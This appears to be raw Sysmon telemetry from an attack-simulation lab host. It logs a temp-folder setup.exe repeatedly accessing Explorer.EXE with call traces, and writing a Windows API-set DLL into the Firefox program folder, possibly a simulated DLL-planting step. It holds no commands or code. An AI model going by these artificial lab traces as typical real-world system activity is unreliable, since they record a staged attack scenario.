Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014218Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.130{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014217Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.130{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014216Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.130{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014215Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.130{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000014214Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.130{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014213Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.130{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014212Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.130{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014211Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.130{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000014210Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.130{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014209Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.130{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014208Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.130{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000014207Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.130{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000014206Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.130{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\api-ms-win-core-processthreads-l1-1-1.dll2021-01-18 13:59:52.130 10341000x800000000000000014205Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014204Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014203Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014202Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014201Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014200Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
